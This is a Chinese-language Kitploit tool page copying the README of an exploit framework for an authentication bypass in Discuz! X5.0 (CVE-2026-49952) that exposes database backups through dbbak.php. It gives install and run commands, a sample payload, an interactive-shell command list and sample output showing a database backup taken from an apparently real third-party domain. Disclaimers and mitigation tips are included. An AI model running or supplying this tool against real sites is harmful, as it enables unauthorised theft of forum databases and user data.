Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0认证绕过漏洞利用框架(CVE-2026-49952)- 关键漏洞,允许通过UC_KEY加密预言机令牌重用进行未认证的数据库备份访问。CVSS 9.1。功能齐全的工具,具有版本检测、多载荷攻击、交互式shell和自动化利用。仅限授权测试。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
身份验证与授权漏洞利用框架漏洞分析Web应用程序漏洞利用信息收集渗透测试数据库安全
GitHubcerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

Discuz! X5.0认证绕过漏洞利用框架(CVE-2026-49952)- 关键漏洞,允许通过UC_KEY加密预言机令牌重用进行未认证的数据库备份访问。CVSS 9.1。功能齐全的工具,具有版本检测、多载荷攻击、交互式shell和自动化利用。仅限授权测试。

查看仓库
121个月前尚未审核

Discuz! X5.0 身份验证绕过利用框架

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1(严重) | 版本 1.0.0

一个专业的渗透测试工具,用于识别并演示 Discuz! X5.0 中严重的身份验证绕过漏洞。

D1

📋 目录

  • ⚠️ 免责声明

  • 🔍 概述

  • 🎯 漏洞详情

  • ✨ 功能特性

  • 📦 安装

  • 🚀 快速开始

  • 💻 使用示例

  • 🖥️ 交互式 Shell

  • 🛡️ 安全注意事项

  • 🔧 故障排除

  • 📄 许可证


⚠️ 免责声明

重要通知:此工具仅供教育目的和授权安全测试使用。 切勿在您不拥有或未获得明确许可的系统上使用此工具。 未经授权访问计算机系统是违法且不道德的。 作者对因使用此工具造成的任何误用或损害不承担任何责任。 使用此工具即表示您同意遵守所有适用的法律法规。


🔍 概述

Discuz! X5.0 身份验证绕过利用框架旨在识别并演示 Discuz! X5.0(2026年3月20日至2026年5月1日发布版本)中严重的身份验证绕过漏洞(CVE-2026-49952)。

该漏洞允许未经身份验证的攻击者通过利用 UC_KEY 加密预言机进行令牌重用,从而访问数据库备份功能(dbbak.php),可能泄露敏感的数据库内容。

主要亮点

  • 🏆 CVSS 评分: 9.1(严重)
  • 🔐 影响: 身份验证绕过
  • 📂 访问: 数据库备份文件
  • ⚡ 复杂度: 低(易于利用)
  • 🎯 目标: Discuz! X5.0(20260320 - 20260501)

🎯 漏洞详情

技术摘要

根本原因

该漏洞存在于 dbbak.php 端点,其令牌验证机制依赖于 UC_KEY 加密预言机。攻击者通过在登录请求(member.php)中构造特定载荷,可获取有效的身份验证令牌,该令牌可被重用以访问数据库备份功能,而无需正确授权。

受影响版本

  • ❌ Discuz! X5.0(20260320 - 20260501) - 存在漏洞
  • ✅ Discuz! X5.0(20260510 及之后) - 已修复

✨ 功能特性

核心功能

  • 🔍 版本检测: 自动指纹识别与 Discuz! 版本识别。
  • ⚡ 多载荷攻击: 并行测试多种载荷变体。
  • 🖥️ 交互式 Shell: 功能齐全的命令行界面,用于手动利用。
  • 🚀 自动化利用: 一键利用,配置极简。
  • 📊 结果保存: 将利用结果导出到带时间戳的文件。
  • 🌐 代理支持: 支持 HTTP/HTTPS 代理配置,便于网络穿越。
  • 🎯 线程扫描: 可配置线程数,优化性能。
  • 🎨 彩色输出: 专业的彩色终端输出。

高级功能

  • 🔐 SSL/TLS 支持: 同时处理 HTTP 和 HTTPS 目标。
  • 🔄 会话管理: 维持持久会话状态。
  • 📦 载荷自定义: 支持自定义载荷注入。
  • 🎯 目标验证: 在利用前验证 Discuz! 安装。

📦 安装

先决条件

  • Python: 版本 3.7 或更高
  • Pip: Python 包管理器

从源码安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# 安装必要包
pip install -r requirements.txt

# 验证安装
python3 exploit.py --help

使用 Docker 安装

root@kitploit:~
# 构建 Docker 镜像
docker build -t exploit .

# 运行容器
docker run -it --rm exploit http://target.com

🚀 快速开始

基本用法

root@kitploit:~
# 简单利用
python3 exploit.py http://target.com

# 指定输出文件
python3 exploit.py http://target.com --output results.txt

# 调试模式(详细输出)
python3 exploit.py http://target.com --verbose

高级用法

root@kitploit:~
# 使用代理和自定义线程数
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# 自定义载荷
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 使用示例

示例 1:基本利用

root@kitploit:~
python3 exploit.py http://discuz.eda.com.my
📤 预期输出
root@kitploit:~
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 身份验证绕过利用框架
CVE-2026-49952 | CVSS: 9.1(严重)
作者: Sudeepa Wanigarathna | 版本: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► 阶段 1:目标侦察
[14:32:15] ➜ 测试与 http://discuz.eda.com.my 的连接
[14:32:16] ➜ 检测 Discuz! 版本...
[14:32:16] ✔ Discuz! 版本:X5.0
[14:32:16] ⚡ 目标运行在存在漏洞的版本!
[14:32:16] ► 阶段 2:Authcode 获取
[14:32:16] ➜ 使用载荷 admin|1|0|0 提取 authcode
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► 阶段 3:利用
[14:32:17] ➜ 执行利用(操作:backup)
[14:32:18] ✔ 利用成功!
[14:32:18] ✔ 结果已保存至 discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  利用成功                                                 ║
╠══════════════════════════════════════════════════════════╣
║  目标: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  状态: 数据库备份已访问                                   ║
║  数据大小: 24567 字节                                     ║
║  保存至: discuz_exploit_20260724_143218.txt              ║
╚══════════════════════════════════════════════════════════╝

🖥️ 交互式 Shell

启动交互式 Shell 进行手动利用:

root@kitploit:~
python3 discuz_exploit.py http://target.com --interactive

可用命令


🛡️ 安全注意事项

✅ 应该做的

  • 仅在你拥有或获得明确许可的系统上使用。
  • 测试前获取书面授权。
  • 遵循负责任的披露规范。
  • 正确向厂商报告漏洞。
  • 在隔离的实验室环境中用于学习。

❌ 不应该做的

  • 未经授权切勿在生产系统上使用。
  • 不要公开分享已利用的数据。
  • 切勿用于非法活动或数据窃取。
  • 测试期间不要修改或删除数据。
  • 未经同意切勿利用。

缓解建议

对于系统管理员:

  1. 立即更新: 升级到 Discuz! X5.0(20260510 或更高版本)。
  2. 禁用端点: 如果不需要,临时禁用 dbbak.php。
  3. 监控日志: 留意可疑的 member.php 和 dbbak.php 访问记录。
  4. WAF 规则: 实施 Web 应用程序防火墙规则以阻止恶意请求。
  5. IP 白名单: 将备份端点访问限制到受信任的 IP。

🔧 故障排除

❌ 连接错误
root@kitploit:~
错误: 无法连接到目标

解决方案:
• 检查目标 URL 是否正确
• 验证网络连接
• 检查是否有防火墙阻止访问
• 尝试使用代理:--proxy http://your_proxy:port
• 确保目标在线且可访问
🚫 身份验证失败
root@kitploit:~
错误: 身份验证失败或 authcode 无效

解决方案:
• 确保目标 Discuz! 版本存在漏洞
• 尝试不同的载荷以提取 authcode
• 检查是否存在网络问题或 WAF 干扰
• 以详细模式运行(--verbose)以获取更多信息

📄 许可证

本项目采用 MIT 许可证。

版权所有 © 2026 Sudeepa Wanigarathna

特此授予任何获得本软件副本及相关文档文件(以下简称“软件”)的人无偿处理本软件的权利,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或销售本软件副本的权利,并允许获得本软件的人这样做,但须满足以下条件:

上述版权声明和本许可声明应包含在本软件的所有副本或实质性部分中。

本软件按“原样”提供,不提供任何明示或暗示的担保,包括但不限于适销性、特定用途适用性和非侵权性的担保。在任何情况下,作者或版权持有人均不对因本软件或本软件的使用或其他交易而产生的任何索赔、损害或其他责任负责,无论是合同行为、侵权行为还是其他行为。


作者: Sudeepa Wanigarathna | GitHub: @CerberusMrXi

⭐ 如果您觉得此工具有用,请考虑给它一个星标!

🔐 负责任地使用。保持道德。持续学习。

下载工具
属性详情
漏洞类型身份验证绕过
CVE IDCVE-2026-49952
CVSS 版本3.1
CVSS 评分9.1(严重)
攻击向量网络
攻击复杂度低
所需权限无
用户交互无
机密性影响高
完整性影响高
可用性影响高
利用代码成熟度功能可用
修复级别官方已修复
命令描述示例
help显示所有可用命令help
scan检测 Discuz! 版本并检查漏洞scan
get [payload]提取 authcode(可选自定义载荷)`get admin
exploit [op]执行利用(默认:backup)exploit backup
save保存结果到文件save
info显示会话信息info
clear清除终端屏幕clear
exit / quit退出交互式 Shellexit